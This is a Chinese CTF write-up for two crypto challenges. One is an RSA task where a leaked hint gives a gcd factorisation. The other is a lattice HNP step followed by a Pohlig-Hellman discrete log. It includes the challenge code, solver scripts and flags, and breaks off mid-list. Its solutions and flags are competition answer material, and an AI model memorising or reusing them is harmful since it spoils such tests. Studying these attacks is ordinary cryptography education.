一、 Crypto
1.NumberTheory
题目源码:
from Crypto.Util.number import *
import hint
flag=b'xxx'
e=65537
p=getPrime(512)
q=getPrime(512)
n=p*q
m=bytes_to_long(flag)
c=pow(m,e,n)
k=getPrime(1024)
assert hint + 233 * k == 233 * k * p
print(n)
print(c)
print(hint)
# 84099006955126261966925371456202769943592466221370095794235167154956697927281125181449320270460637820908574232493978429962263974458426503598700104493216727535451616752760724333653967152401716945549285008242019874215196489846481143398374860288545040874468108191037481101604627874268575884573685952474988256841
# 28098063654079651384124474197746356824080585622155888018279898490747561415908220072536298610509681898119018709183606442183944207485940115624047842734359988590155403601250406116023121958193303908964857108526965815235457652033182982467968474248778435731228104089366239566977364311197776651102290796373095167764
# 411245630228311610573345621334618725748702407327926883063919892785851166202383809662483938501531987094884084543300939673794551515912845363503988032311234800260819110323258416786417746444373651130257247926678135654564298408894174083333804257126735899220917359603430399033328133462456659839525671074605146583034398735379485362144932899212206419889556154825755723979850750847762362288223441051219637465296077020565435562941976546609555729574021362954126496825972439730
解题exp:
from random import randint
from Cryptodome.Util.number import long_to_bytes
from gmpy2 import gcd, invert
e=65537
n=84099006955126261966925371456202769943592466221370095794235167154956697927281125181449320270460637820908574232493978429962263974458426503598700104493216727535451616752760724333653967152401716945549285008242019874215196489846481143398374860288545040874468108191037481101604627874268575884573685952474988256841
c=28098063654079651384124474197746356824080585622155888018279898490747561415908220072536298610509681898119018709183606442183944207485940115624047842734359988590155403601250406116023121958193303908964857108526965815235457652033182982467968474248778435731228104089366239566977364311197776651102290796373095167764
hint=411245630228311610573345621334618725748702407327926883063919892785851166202383809662483938501531987094884084543300939673794551515912845363503988032311234800260819110323258416786417746444373651130257247926678135654564298408894174083333804257126735899220917359603430399033328133462456659839525671074605146583034398735379485362144932899212206419889556154825755723979850750847762362288223441051219637465296077020565435562941976546609555729574021362954126496825972439730
a=2
p = gcd(pow(a, hint, n)-1, n)
q = n // p
phi = (p-1) * (q-1)
d = invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
#b'flag{a3878d9436b7c80e6ecfda33b7b0b840}'或者
from Crypto.Util.number import *
import gmpy2
e = 65537
n = 105531804094410236294687082475828411218788143973352026416392542762437103918840861241726193253936370648195682452618343195471719649394086997793137653518966739212122830015579955183805636213883066694989610003565432493653164047938048521354525623612253955387430773546124647105772639376194421783783651686606080214099
c = 6838127295540107402282470465780599628759317234806902778570348919850980664834107227012249617036087381075344016550381137159643512672239826438903241091658619314078921936719784123522758604349399440232971511649918093228288847534685526358191804172060250409498531941883162873696671060909325234109062997554795436940
h = 225457129615945961139095949356083106510992163176770860368085043522677811094793442173512565115313130227614423196268240217775831118417780318014842280209747426271227826513967791945116378179885000662888744992914390207196310600996050316737090999399962338133222370745589250853315876818226312453376340282748842779666176953455553054310328901299083159029050169950812885486884682347263045764918907196922313892044095742248895091717187372068779768743879411865275203496650858608
#hint + 233 * k == 233 * k * p
# hint / 233*k + 1 == p
# hint / 233*k == p-1
# hint /233 = k*(p-1) = k*phi(p)
# 费马小定理
# a^ k*phi(p) == 1 modp
# a^(hint /233) == 1 modp
# a^(hint /233) -1 == 0 modp
# n == 0 modp
a =2
p = gmpy2.gcd(n, pow(a, (h //233), n)-1)
print(p)
q = n//p
phi = (p-1)*(q-1)
d = gmpy2.invert(e, phi)
print(long_to_bytes(pow(c, d, n)))2.easy_lwe
题目源码:
from Crypto.Util.number import *
from secrets import flag
assert len(flag) == 38
p = getPrime(512)
m = getPrime(512)
while m > p:
m = getPrime(512)
aa = []
cc = []
bb = []
for i in range(30):
a = getPrime(512)
b = getPrime(400)
c = (a * m + b) % p
aa.append(a)
cc.append(c)
bb.append(b)
enc = pow(m,flag,p)
print(f'p = {p}')
print(f'aa = {aa}')
print(f'cc = {cc}')
print(f'enc = {enc}')
# p = 0x83b05d231fd40ff8ca26b4fb8136dc920754c14412960ce2ec700457861d48fe74f3958fc3a153f77a23fb850ecf0ac1e9722c71b6cc8a104b372cc17bf1528f
# aa = [0xf53f440f2e76b60380e68e96508f5dd716b2c3df2ed8265ced83a93fd61a708eeff31fbee9efa22fa7b441cbc406c210de6273f81eb7d093561d5c6394ef2abd,0xe9ecbd5457dcf1bdbc1a852b625c7a8ae6f530e348c2dc0416afd6a375aeb06d4800cc6471ae7d29681715d0407aa8726c32cd35e54960f56b0d9b47a2eed9ed,0x86a261c1590a774ced6c7db439e53e4068a8dbc0ad111a0e0371e8731fb939a068348d035da04afb9a3914a011574e35cefc4d5c5740f7cbc27459d944f51d15,0xba99a871d8f805e3c0dcd4e04cee66ec5e213a7902a65f2faa8e86368e56c42d09fde536b07471fff8f72db922725a24d6288d1bfe9edc2cd76b756eb464e1eb,0xa99efeb79377db6baa8787b5d2d2ebf123d8ec77e820d1b88644883a07c38498aa08df82cb9802c7fa128a5fa08b66c56a0805f70a78b7cb45b1a74bde095165,0xe6341800304b0a6f2de941432bb253f53a3c73c7b0f0382fd1ec4c882da5fd1b5151c619f9279de3767ae03af387c495c50c8c0ff79fd6c8acb51bd0b16afc23,0xa8670f7142e5d90e781e335d5e870188b94288defd8302c1b183bf20b5a3720be1ae1afe0ad937bc4678727e1daf262194c430086f3810447dfce721c8fb36a5,0xe9d150d4e7a7f82e89d26fcaa003579c8dfc25f4a50794175ae0a4407dd33e87eb5fded328155009548c002d2a3198afa356e1692a6bb820d8ae71ca6e506b35,0xd7ec72dd643449f5d21a32a11e2458d292c524b91b4b1a8515a5f8351717813f51a55c5675aa0eaa5c80a32d26aa385d7425e7d3e1e50936b2744a1534e3c7b7,0xaf5d8062f6bc03875b5fb10d0888d586cb08fa62709910cd7d931201d4d833d31d935003b801cac4fd51ef1e4db3bc13e41d740d7881560c0942faf9acca55d5,0xf63c4a5add0474bf6c4fb6617a2965e2474a2902c59bcc4243d5dcffa0f1aa0a6136e9c9093ea05d84a26888aaad63ec652602200141abdfcdc0d1912d208dbb,0xd65c8ef9b01085819f2f5f2dfbb7641521966600ddd7a03b886320328144ec42ed5585206744c8e1b5beb5502aff6f0cd01934890926bbb5387363b321dbb6bd,0x9bd7a0e9d4940126c9668de7e29e198ac38010d505b90e92ee560307b8a134545bbd0277f14e7651e91c5a9362207097e17888b9a49a889c672f76681f41962f,0xff387c4e94f47cba242936e80d620d3eeb203a1c7f365ae178b33b29ff3d8c2f932733d0605876c23942bae7f096b3ee457d02758796bda01bbcd3bd2e1229a1,0xbd6c24205cf5b9b2acc909296369ca77ef34ceac5f9900742a7ec37c00b94a56418d168d576d33383d9f782386524c4cecebc3a9fa68c81a5a6867de564d07e3,0x8850ac2051b6a7450f228e676abbfd510ce08a43a0b791182aedcfb6b3f1d478e3dc953e59eb99fe370f71d52af3a1625e0700078927f8a5919becbfa60af96b,0xfa474444b5372681c5b7316871cf9a93306b4d6a3eac2492c71780eb6903bd4ff77b1c4a28608dfa10c0c8b8bfc23942fc0a8ec64d3967504621e692eafcf4af,0xfd7f772c719929d33f15ce0122f6efc278b728d75dbd16a343c649e49118a79084d169d6db1b6b859e1f4c82694a850622dcdff23c8fbd7d0a736a409b94f471,0xedf6566ecd7f0a0beaa2f45a2a509358c9537dbf772e6f63ccb0e21b5c5c3dae0939e9e15c9bcdf80f7875e74ebfba16f0660737719c8ad435981b5b8df89a23,0xd7e718dafb753084cb7c1deee139f6e158a0228bbf9b0ae5ed3a8b3d2508ce62e4e32cd43a3135540b31e052e6e3a0dba3ae623c69d74da34387c3429b6f0487,0xbff5ab718c54909a34ba8ab5787cbfb0c9c57394350b71744d5751f577cefda87cc8263b21dd2c21a8f19fff8362c3371fcb054dddb1293df7d6efe2d661e4ab,0xb946ad47cf1f9186c1eeaeed12f21b41a29f9fb74b14f577c97731004b372c5f41023aafc9b93557c984ff87dd263b293aa500c3a2ce1f0815319263cf7c42d5,0x9b93853dc5f4c052fdda339f69c625bc98ffdbde439078458b84278e34542f9110863e5beef166a766f565f7a815ec4a462510b42f81454b65e648622c610b27,0xae050aaa86b9580747efa33561973597d7d7a0684a45219eed3224ebc37fdf067ed61a29ecaa501266c9bcdd16b850c0dd40da3f964a5b03ae60c3967fd55913,0xea57b0482a876d49a3e21bb885bda0aae21f5fcf2521f7e1db771998b6b639d0833c17d7c8c67c12ce9b60e4210e068f98344a8cabc5faa17a048100bab797bb,0x9f866ad27c9ea2fb29168ec6db0f7755221484d0c89bfef0cd70fc2ed14fda15f7b59bbca2e23f40b5effeb9e53ad821e06cf986b34da4407c85bfbf78d2920b,0xab0939605dcff5d1ec8405b6daeb65eccc6e3b5956601dddea95c6310ac32bfeec1bab6b83e85371078a16ea9489050175098d39488aaed2a190c647fe2b1b69,0xe85698e04d8bedbac2c7884c914b7026dbb1dd5134c4a5a8e7541b07c8a94ab3d2f12eb7f1171ccd564054e1dc63d5ac044e5c5552870b419fef35a572199239,0xea94663e103e4354fb7feb80b11d06c7e16feb7265f69ee882180baba70fa075df24e3fe1ad12a99f054cabf4a3f5e4823416d4c4daa02ca51ce3926034186db,0x93662718294005f4ac8f79b0799e240a05eea871ef07d623ea7c68ef818b3b55fb4f9b6f06c399726e59cec03389053b448f187404cddb93cb3c55e3d12cebc9]
# cc = [0x4aae29aaaab89fbc672db400c41d1ad3ffce937e7810065bed552c12101fb778046d22b00c05bbc3f61825b5af3c3e57f1abaafe3d9a58a573a905e2a1cecde7,0x502a1c23ef44f174aaedb9a49705eb72f805bab13e82d599525ea7484cc11f2e7c4475526b4be344390e46bcb8bcdaba2768c6321f8ca5482666171eee498f28,0x546f2276b59b7186ef5b9a04e0ba2691648d005fc780303411a1082ea3b05be127a10e26921a4b84b14d8acc45a6c32a0142ac6eb396415ecb5841a01b775b5d,0x43986eb7208b66dd86c12f953e10b2d3907873151170278393b6a4f7ea518ab5745e2db5f4dbec84087c4817c5df10e743f35ed1190515aba34832b1b274bf2e,0x7b2e448342bc7409ed891cdbf5137014f417866097297302085d8800458495e374fba8398d069f1c1c7792a9f03194e36921c378308de18313fb9b62db45cc0a,0x41ac8f265bc96ae868256fb08caf0a43a547346522b5d90cb9489c87cd5d726447d20354332dd3cb771003eddfa9c4bfa6923ae45ac8c0994f7cce46a3302eea,0x51b59ad39b388fdb2056279e2de02d32d36b52da1cc1fe4f6843964273b4585704e21405e2528e5894bd4fdb436c382a5f7d3849f9c5d7902be74edd2b16a31c,0x4e52d207f16a6f42497b25600e039de3ce49d7945ac2201ac12bf9fa9b3dc136f35328cbe9d3f9d4204d90f29fe1ce209c8904c99de0f85c5c572d05609095a6,0x6485f505cd8296e9f1c9abdc39eebc6e767e98e1587b18878fa8a582a012bb609c2f36daffc2b9c460514bc47533525ce6835e7f8123331a833958fa47f2e40,0x1ff809e71ab0347a8a9ec4356d5b8fbf109ade5881e5b59ac14adaaef2034fc40880e495070442513f42434fa8cbfcd9bce0501574997b35939f201ba1c87872,0x5b3fad73b402fcc1148758d80a61f637257d35f2773c8dc9f22859a01aecaa37a37858232ab5b3e3622f234bf35bb02a6e93ecd5a06182b61e583d0193afaf55,0x640e3556a526209f8528fbe678da3914d912a7e701abc3d4fcd65d84bcdbfc22623dfa3db31f9585a615c6de869b39c040dbfe94bb7eafd91bde15c4b87bd2c0,0x335b0ff42f39541539752faade7510a301a861720d85958ce2890ddca9e0693b342604a5b134a0974ea21dc0dc0a156c01159898e5f87e16b4a56121c2e3bbb5,0x89621740ec8b81065457105685666dfe6e31ee4f0a6efa6901e20ad6e5ea19ba438ea92f632764e52ccfb1ed35639443b5536f19ca69e9c295c6f5287a5e31b,0x1e4162060327045be0f5a0ae5d7b87c60b928e4669450339af64a39ae45b108eb58bbe83e15bef7a5c92243b213adc3e9d3514632249314bf5b588df6202ae10,0x5d10e308a16f8cd5c53b3ecd1081624e6eed4c3bfe522a8b7daf301aa6fc370b0a1cff1db7ea27aa6f5200903b365c53bc6d890ca1167ca57de87f80c5321742,0x434ac82b1ed073a1d73606ffe973e316768368fb522644f6cc76d2a0e6b83f533524c7589113aeb2db35d50c2f9ff64ceb27958a93d47b6875b8eb9b158ebaac,0x7cf3028273ece2a8af9790d3a689875bf7a3894e351a639d88fa13de05dc7f18be20ddeef4414a31b0f3dd65291e5d4d47d098027dbec25d4bc5409c017f0b03,0x5d0eefe7de32360d7950d96d821ce06741b737a1dca016cb003f75e380f5c8e3d9b8505b0eda21b36879a6455d1f640bdac5ad648b97d80eacf406b57bb1d692,0x4e4c6156da7f71123e1b4efde4a436985c6f2cccdc9b182735a75153927c6e7dc94693ab7fdd8646821a9d42eeb76c1be54984f81296a10e689805975185bf2c,0x68db6b837d968569ba944591efb36587f0022b05cefbedaad1e1d7652d0c233d1c0b036364f25e0865c7a1dab8d9d1081f23928a3573b5ec711e5b7f32714a4,0x333db46bc5fb83cbbf68475fd612bcad6becd30f95bf5b9ab6058ed0777fcb78cfe6da5c3386799fe9a1d6616801154ae7f45e35612de08efed7e2e750088b8e,0x70d4dc8986c228e12329af934c08f7c0ca94ce6913b5c641c59b3cf629a1957f82d4f40aaa7faa765c75e4f994a8222a4d08e045fb529da5ee277e1b9540c148,0x20421569b3bc73da4505760f7798a504f2276e6df9c9e48320b23201fb682021d168f6ee657fc2080722eb576ac78bf4b63ad7419983a05196fa0724fc4886d,0x5f523df584f43d7eff229d562793c8e5d4713d9c80bd40b95434c34c982324f7c282ac2fe3ac151cb62435b85bece2ef115c6f4b7a33d47dcbfa8360f89b91ac,0x7cbedea149640064a93cb75b909804ee7a896e17da808579206d1db7523b98bdf15bdc70e267e0a201bf293f980c1b5304337a7a78cc655aca07b9818b7169ab,0x62b34eaac3d3a2b360805cc23147ff8754a9d90788461107a5c8cc7053a0910ca7af45035d333c9a0b7cf6a2c13c9c367ad8eea0ccda2a6d8e089b5ee07a76ef,0x3e1c31f988e238869fad4794beb32164fa3bf3880041d1f9f2a65e2679f951491fcbeff1aa067313bf02100ae15d1af4d87050db05cec934e077c3eec238b72,0x3c056ad33432e1cf5548ae3a6db21ee1471eb70619e0ad542bd38dd80f37b76b571ae6469bacd33f9618b7a61b8e8424fc33cae479375df72b064a5d1b8cd90f,0x4caf081f5b949e65115e18b613ad8dc1fc208d2c5bea710b27b1db11d4a7eecc455c13f2fd92481f8cfea3e6fa75c0a58a154f12b6ce92c66107f617fd7ed7d8]
# enc = 0x191eb43459bd0f2d5ece00ab52c612668bb4c161014641a6e4afb41020465d7b82e9b60a55ab831bb5695f2fd832d08258c752ebf27ba0374b7b11b001b2629a首先这题分两部分来看。分别是第一部分的HNP问题和第二部分的DLP问题,接下来我们分别分析。
HNP
其中为的上界,为常系数。我们进行LLL算法即可得到该向量,并从中还原。
from Crypto.Util.number import *
p= 0x83b05d231fd40ff8ca26b4fb8136dc920754c14412960ce2ec700457861d48fe74f3958fc3a153f77a23fb850ecf0ac1e9722c71b6cc8a104b372cc17bf1528f
rs =[0xf53f440f2e76b60380e68e96508f5dd716b2c3df2ed8265ced83a93fd61a708eeff31fbee9efa22fa7b441cbc406c210de6273f81eb7d093561d5c6394ef2abd,0xe9ecbd5457dcf1bdbc1a852b625c7a8ae6f530e348c2dc0416afd6a375aeb06d4800cc6471ae7d29681715d0407aa8726c32cd35e54960f56b0d9b47a2eed9ed,0x86a261c1590a774ced6c7db439e53e4068a8dbc0ad111a0e0371e8731fb939a068348d035da04afb9a3914a011574e35cefc4d5c5740f7cbc27459d944f51d15,0xba99a871d8f805e3c0dcd4e04cee66ec5e213a7902a65f2faa8e86368e56c42d09fde536b07471fff8f72db922725a24d6288d1bfe9edc2cd76b756eb464e1eb,0xa99efeb79377db6baa8787b5d2d2ebf123d8ec77e820d1b88644883a07c38498aa08df82cb9802c7fa128a5fa08b66c56a0805f70a78b7cb45b1a74bde095165,0xe6341800304b0a6f2de941432bb253f53a3c73c7b0f0382fd1ec4c882da5fd1b5151c619f9279de3767ae03af387c495c50c8c0ff79fd6c8acb51bd0b16afc23,0xa8670f7142e5d90e781e335d5e870188b94288defd8302c1b183bf20b5a3720be1ae1afe0ad937bc4678727e1daf262194c430086f3810447dfce721c8fb36a5,0xe9d150d4e7a7f82e89d26fcaa003579c8dfc25f4a50794175ae0a4407dd33e87eb5fded328155009548c002d2a3198afa356e1692a6bb820d8ae71ca6e506b35,0xd7ec72dd643449f5d21a32a11e2458d292c524b91b4b1a8515a5f8351717813f51a55c5675aa0eaa5c80a32d26aa385d7425e7d3e1e50936b2744a1534e3c7b7,0xaf5d8062f6bc03875b5fb10d0888d586cb08fa62709910cd7d931201d4d833d31d935003b801cac4fd51ef1e4db3bc13e41d740d7881560c0942faf9acca55d5,0xf63c4a5add0474bf6c4fb6617a2965e2474a2902c59bcc4243d5dcffa0f1aa0a6136e9c9093ea05d84a26888aaad63ec652602200141abdfcdc0d1912d208dbb,0xd65c8ef9b01085819f2f5f2dfbb7641521966600ddd7a03b886320328144ec42ed5585206744c8e1b5beb5502aff6f0cd01934890926bbb5387363b321dbb6bd,0x9bd7a0e9d4940126c9668de7e29e198ac38010d505b90e92ee560307b8a134545bbd0277f14e7651e91c5a9362207097e17888b9a49a889c672f76681f41962f,0xff387c4e94f47cba242936e80d620d3eeb203a1c7f365ae178b33b29ff3d8c2f932733d0605876c23942bae7f096b3ee457d02758796bda01bbcd3bd2e1229a1,0xbd6c24205cf5b9b2acc909296369ca77ef34ceac5f9900742a7ec37c00b94a56418d168d576d33383d9f782386524c4cecebc3a9fa68c81a5a6867de564d07e3,0x8850ac2051b6a7450f228e676abbfd510ce08a43a0b791182aedcfb6b3f1d478e3dc953e59eb99fe370f71d52af3a1625e0700078927f8a5919becbfa60af96b,0xfa474444b5372681c5b7316871cf9a93306b4d6a3eac2492c71780eb6903bd4ff77b1c4a28608dfa10c0c8b8bfc23942fc0a8ec64d3967504621e692eafcf4af,0xfd7f772c719929d33f15ce0122f6efc278b728d75dbd16a343c649e49118a79084d169d6db1b6b859e1f4c82694a850622dcdff23c8fbd7d0a736a409b94f471,0xedf6566ecd7f0a0beaa2f45a2a509358c9537dbf772e6f63ccb0e21b5c5c3dae0939e9e15c9bcdf80f7875e74ebfba16f0660737719c8ad435981b5b8df89a23,0xd7e718dafb753084cb7c1deee139f6e158a0228bbf9b0ae5ed3a8b3d2508ce62e4e32cd43a3135540b31e052e6e3a0dba3ae623c69d74da34387c3429b6f0487,0xbff5ab718c54909a34ba8ab5787cbfb0c9c57394350b71744d5751f577cefda87cc8263b21dd2c21a8f19fff8362c3371fcb054dddb1293df7d6efe2d661e4ab,0xb946ad47cf1f9186c1eeaeed12f21b41a29f9fb74b14f577c97731004b372c5f41023aafc9b93557c984ff87dd263b293aa500c3a2ce1f0815319263cf7c42d5,0x9b93853dc5f4c052fdda339f69c625bc98ffdbde439078458b84278e34542f9110863e5beef166a766f565f7a815ec4a462510b42f81454b65e648622c610b27,0xae050aaa86b9580747efa33561973597d7d7a0684a45219eed3224ebc37fdf067ed61a29ecaa501266c9bcdd16b850c0dd40da3f964a5b03ae60c3967fd55913,0xea57b0482a876d49a3e21bb885bda0aae21f5fcf2521f7e1db771998b6b639d0833c17d7c8c67c12ce9b60e4210e068f98344a8cabc5faa17a048100bab797bb,0x9f866ad27c9ea2fb29168ec6db0f7755221484d0c89bfef0cd70fc2ed14fda15f7b59bbca2e23f40b5effeb9e53ad821e06cf986b34da4407c85bfbf78d2920b,0xab0939605dcff5d1ec8405b6daeb65eccc6e3b5956601dddea95c6310ac32bfeec1bab6b83e85371078a16ea9489050175098d39488aaed2a190c647fe2b1b69,0xe85698e04d8bedbac2c7884c914b7026dbb1dd5134c4a5a8e7541b07c8a94ab3d2f12eb7f1171ccd564054e1dc63d5ac044e5c5552870b419fef35a572199239,0xea94663e103e4354fb7feb80b11d06c7e16feb7265f69ee882180baba70fa075df24e3fe1ad12a99f054cabf4a3f5e4823416d4c4daa02ca51ce3926034186db,0x93662718294005f4ac8f79b0799e240a05eea871ef07d623ea7c68ef818b3b55fb4f9b6f06c399726e59cec03389053b448f187404cddb93cb3c55e3d12cebc9]
cs =[0x4aae29aaaab89fbc672db400c41d1ad3ffce937e7810065bed552c12101fb778046d22b00c05bbc3f61825b5af3c3e57f1abaafe3d9a58a573a905e2a1cecde7,0x502a1c23ef44f174aaedb9a49705eb72f805bab13e82d599525ea7484cc11f2e7c4475526b4be344390e46bcb8bcdaba2768c6321f8ca5482666171eee498f28,0x546f2276b59b7186ef5b9a04e0ba2691648d005fc780303411a1082ea3b05be127a10e26921a4b84b14d8acc45a6c32a0142ac6eb396415ecb5841a01b775b5d,0x43986eb7208b66dd86c12f953e10b2d3907873151170278393b6a4f7ea518ab5745e2db5f4dbec84087c4817c5df10e743f35ed1190515aba34832b1b274bf2e,0x7b2e448342bc7409ed891cdbf5137014f417866097297302085d8800458495e374fba8398d069f1c1c7792a9f03194e36921c378308de18313fb9b62db45cc0a,0x41ac8f265bc96ae868256fb08caf0a43a547346522b5d90cb9489c87cd5d726447d20354332dd3cb771003eddfa9c4bfa6923ae45ac8c0994f7cce46a3302eea,0x51b59ad39b388fdb2056279e2de02d32d36b52da1cc1fe4f6843964273b4585704e21405e2528e5894bd4fdb436c382a5f7d3849f9c5d7902be74edd2b16a31c,0x4e52d207f16a6f42497b25600e039de3ce49d7945ac2201ac12bf9fa9b3dc136f35328cbe9d3f9d4204d90f29fe1ce209c8904c99de0f85c5c572d05609095a6,0x6485f505cd8296e9f1c9abdc39eebc6e767e98e1587b18878fa8a582a012bb609c2f36daffc2b9c460514bc47533525ce6835e7f8123331a833958fa47f2e40,0x1ff809e71ab0347a8a9ec4356d5b8fbf109ade5881e5b59ac14adaaef2034fc40880e495070442513f42434fa8cbfcd9bce0501574997b35939f201ba1c87872,0x5b3fad73b402fcc1148758d80a61f637257d35f2773c8dc9f22859a01aecaa37a37858232ab5b3e3622f234bf35bb02a6e93ecd5a06182b61e583d0193afaf55,0x640e3556a526209f8528fbe678da3914d912a7e701abc3d4fcd65d84bcdbfc22623dfa3db31f9585a615c6de869b39c040dbfe94bb7eafd91bde15c4b87bd2c0,0x335b0ff42f39541539752faade7510a301a861720d85958ce2890ddca9e0693b342604a5b134a0974ea21dc0dc0a156c01159898e5f87e16b4a56121c2e3bbb5,0x89621740ec8b81065457105685666dfe6e31ee4f0a6efa6901e20ad6e5ea19ba438ea92f632764e52ccfb1ed35639443b5536f19ca69e9c295c6f5287a5e31b,0x1e4162060327045be0f5a0ae5d7b87c60b928e4669450339af64a39ae45b108eb58bbe83e15bef7a5c92243b213adc3e9d3514632249314bf5b588df6202ae10,0x5d10e308a16f8cd5c53b3ecd1081624e6eed4c3bfe522a8b7daf301aa6fc370b0a1cff1db7ea27aa6f5200903b365c53bc6d890ca1167ca57de87f80c5321742,0x434ac82b1ed073a1d73606ffe973e316768368fb522644f6cc76d2a0e6b83f533524c7589113aeb2db35d50c2f9ff64ceb27958a93d47b6875b8eb9b158ebaac,0x7cf3028273ece2a8af9790d3a689875bf7a3894e351a639d88fa13de05dc7f18be20ddeef4414a31b0f3dd65291e5d4d47d098027dbec25d4bc5409c017f0b03,0x5d0eefe7de32360d7950d96d821ce06741b737a1dca016cb003f75e380f5c8e3d9b8505b0eda21b36879a6455d1f640bdac5ad648b97d80eacf406b57bb1d692,0x4e4c6156da7f71123e1b4efde4a436985c6f2cccdc9b182735a75153927c6e7dc94693ab7fdd8646821a9d42eeb76c1be54984f81296a10e689805975185bf2c,0x68db6b837d968569ba944591efb36587f0022b05cefbedaad1e1d7652d0c233d1c0b036364f25e0865c7a1dab8d9d1081f23928a3573b5ec711e5b7f32714a4,0x333db46bc5fb83cbbf68475fd612bcad6becd30f95bf5b9ab6058ed0777fcb78cfe6da5c3386799fe9a1d6616801154ae7f45e35612de08efed7e2e750088b8e,0x70d4dc8986c228e12329af934c08f7c0ca94ce6913b5c641c59b3cf629a1957f82d4f40aaa7faa765c75e4f994a8222a4d08e045fb529da5ee277e1b9540c148,0x20421569b3bc73da4505760f7798a504f2276e6df9c9e48320b23201fb682021d168f6ee657fc2080722eb576ac78bf4b63ad7419983a05196fa0724fc4886d,0x5f523df584f43d7eff229d562793c8e5d4713d9c80bd40b95434c34c982324f7c282ac2fe3ac151cb62435b85bece2ef115c6f4b7a33d47dcbfa8360f89b91ac,0x7cbedea149640064a93cb75b909804ee7a896e17da808579206d1db7523b98bdf15bdc70e267e0a201bf293f980c1b5304337a7a78cc655aca07b9818b7169ab,0x62b34eaac3d3a2b360805cc23147ff8754a9d90788461107a5c8cc7053a0910ca7af45035d333c9a0b7cf6a2c13c9c367ad8eea0ccda2a6d8e089b5ee07a76ef,0x3e1c31f988e238869fad4794beb32164fa3bf3880041d1f9f2a65e2679f951491fcbeff1aa067313bf02100ae15d1af4d87050db05cec934e077c3eec238b72,0x3c056ad33432e1cf5548ae3a6db21ee1471eb70619e0ad542bd38dd80f37b76b571ae6469bacd33f9618b7a61b8e8424fc33cae479375df72b064a5d1b8cd90f,0x4caf081f5b949e65115e18b613ad8dc1fc208d2c5bea710b27b1db11d4a7eecc455c13f2fd92481f8cfea3e6fa75c0a58a154f12b6ce92c66107f617fd7ed7d8]
enc=0x191eb43459bd0f2d5ece00ab52c612668bb4c161014641a6e4afb41020465d7b82e9b60a55ab831bb5695f2fd832d08258c752ebf27ba0374b7b11b001b2629a
t = len(rs)
kbits = 400
K = 2 ** kbits
P = identity_matrix(t) * p
RC = matrix([[-1, 0], [0, 1]]) * matrix([rs, cs])
KP = matrix([[K / p, 0], [0, K]])
M = block_matrix([[P, 0], [RC, KP]], subdivide=False)
shortest_vector = M.LLL()
x = shortest_vector[1, -2] / K * p % p
print(x)
#x=6789891305297779556556571922812978922375073901749764215969003309869718878076269545304055843125301553103531252334876560433405451108895206969904268456786139DLP
DLP(离散对数问题),由很多算法求解,对于本题。经过检测我们发现有很多小因子,因此我们可以认为是光滑的,那么就适用于Pohlig-Hellman算法进行求解,对于的最后一个大素数因子,我们采用爆破的方法求解最后几位。
G=GF(p)
factors, exps = zip(*factor(p - 1))
primes = [factors[i] ^ exps[i] for i in range(len(factors))]
print(primes)
dlogs = []
for fac in primes[:-1]:
t = (p - 1) // fac
dlog = discrete_log(G(pow(enc, t, p)), G(pow(x, t, p)))
dlogs += [dlog]
s = (p - 1) // primes[-1]
print(s)
res = crt(dlogs, primes[:-1])
for i in range(100):
if b'flag{'in long_to_bytes(res + i * s):
print(long_to_bytes(res + i * s))
break解题exp:
from Crypto.Util.number import *
p= 0x83b05d231fd40ff8ca26b4fb8136dc920754c14412960ce2ec700457861d48fe74f3958fc3a153f77a23fb850ecf0ac1e9722c71b6cc8a104b372cc17bf1528f
rs =[0xf53f440f2e76b60380e68e96508f5dd716b2c3df2ed8265ced83a93fd61a708eeff31fbee9efa22fa7b441cbc406c210de6273f81eb7d093561d5c6394ef2abd,0xe9ecbd5457dcf1bdbc1a852b625c7a8ae6f530e348c2dc0416afd6a375aeb06d4800cc6471ae7d29681715d0407aa8726c32cd35e54960f56b0d9b47a2eed9ed,0x86a261c1590a774ced6c7db439e53e4068a8dbc0ad111a0e0371e8731fb939a068348d035da04afb9a3914a011574e35cefc4d5c5740f7cbc27459d944f51d15,0xba99a871d8f805e3c0dcd4e04cee66ec5e213a7902a65f2faa8e86368e56c42d09fde536b07471fff8f72db922725a24d6288d1bfe9edc2cd76b756eb464e1eb,0xa99efeb79377db6baa8787b5d2d2ebf123d8ec77e820d1b88644883a07c38498aa08df82cb9802c7fa128a5fa08b66c56a0805f70a78b7cb45b1a74bde095165,0xe6341800304b0a6f2de941432bb253f53a3c73c7b0f0382fd1ec4c882da5fd1b5151c619f9279de3767ae03af387c495c50c8c0ff79fd6c8acb51bd0b16afc23,0xa8670f7142e5d90e781e335d5e870188b94288defd8302c1b183bf20b5a3720be1ae1afe0ad937bc4678727e1daf262194c430086f3810447dfce721c8fb36a5,0xe9d150d4e7a7f82e89d26fcaa003579c8dfc25f4a50794175ae0a4407dd33e87eb5fded328155009548c002d2a3198afa356e1692a6bb820d8ae71ca6e506b35,0xd7ec72dd643449f5d21a32a11e2458d292c524b91b4b1a8515a5f8351717813f51a55c5675aa0eaa5c80a32d26aa385d7425e7d3e1e50936b2744a1534e3c7b7,0xaf5d8062f6bc03875b5fb10d0888d586cb08fa62709910cd7d931201d4d833d31d935003b801cac4fd51ef1e4db3bc13e41d740d7881560c0942faf9acca55d5,0xf63c4a5add0474bf6c4fb6617a2965e2474a2902c59bcc4243d5dcffa0f1aa0a6136e9c9093ea05d84a26888aaad63ec652602200141abdfcdc0d1912d208dbb,0xd65c8ef9b01085819f2f5f2dfbb7641521966600ddd7a03b886320328144ec42ed5585206744c8e1b5beb5502aff6f0cd01934890926bbb5387363b321dbb6bd,0x9bd7a0e9d4940126c9668de7e29e198ac38010d505b90e92ee560307b8a134545bbd0277f14e7651e91c5a9362207097e17888b9a49a889c672f76681f41962f,0xff387c4e94f47cba242936e80d620d3eeb203a1c7f365ae178b33b29ff3d8c2f932733d0605876c23942bae7f096b3ee457d02758796bda01bbcd3bd2e1229a1,0xbd6c24205cf5b9b2acc909296369ca77ef34ceac5f9900742a7ec37c00b94a56418d168d576d33383d9f782386524c4cecebc3a9fa68c81a5a6867de564d07e3,0x8850ac2051b6a7450f228e676abbfd510ce08a43a0b791182aedcfb6b3f1d478e3dc953e59eb99fe370f71d52af3a1625e0700078927f8a5919becbfa60af96b,0xfa474444b5372681c5b7316871cf9a93306b4d6a3eac2492c71780eb6903bd4ff77b1c4a28608dfa10c0c8b8bfc23942fc0a8ec64d3967504621e692eafcf4af,0xfd7f772c719929d33f15ce0122f6efc278b728d75dbd16a343c649e49118a79084d169d6db1b6b859e1f4c82694a850622dcdff23c8fbd7d0a736a409b94f471,0xedf6566ecd7f0a0beaa2f45a2a509358c9537dbf772e6f63ccb0e21b5c5c3dae0939e9e15c9bcdf80f7875